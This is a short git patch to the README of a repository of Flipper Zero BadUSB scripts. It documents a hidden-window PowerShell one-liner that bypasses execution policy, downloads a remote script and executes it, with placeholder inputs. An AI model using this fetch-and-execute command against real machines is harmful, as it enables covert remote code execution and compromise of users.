From 1b048a02cec792ee29f22de6ae87f2eb85cf666b Mon Sep 17 00:00:00 2001 From: beigeworm <93350544+beigeworm@users.noreply.github.com> Date: Mon, 17 Jul 2023 15:45:03 +0000 Subject: [PATCH] Update README.md --- Fast-Execution-Scripts/README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/Fast-Execution-Scripts/README.md b/Fast-Execution-Scripts/README.md index b0fb040..ddaf19c 100644 --- a/Fast-Execution-Scripts/README.md +++ b/Fast-Execution-Scripts/README.md @@ -1,10 +1,10 @@ # Downloadable-Ducky-Scripts-For-FlipperZero -**These scripts download scripts to run from this repo -** +**These scripts download and run from this repo -** https://github.com/beigeworm/assets/tree/main/Scripts -they all use this command > `powershell -NoP -Ep Bypass -W H -C $variable='USER_INPUT_HERE'; irm HOSTED_SCRIPT_URL_HERE | iex` +they all use this command > `STRING powershell -NoP -Ep Bypass -W H -C $variable='USER_INPUT_HERE'; irm HOSTED_SCRIPT_URL_HERE | iex` These scripts range from harmless pranks to nefarious red team tools. For educational purposes only!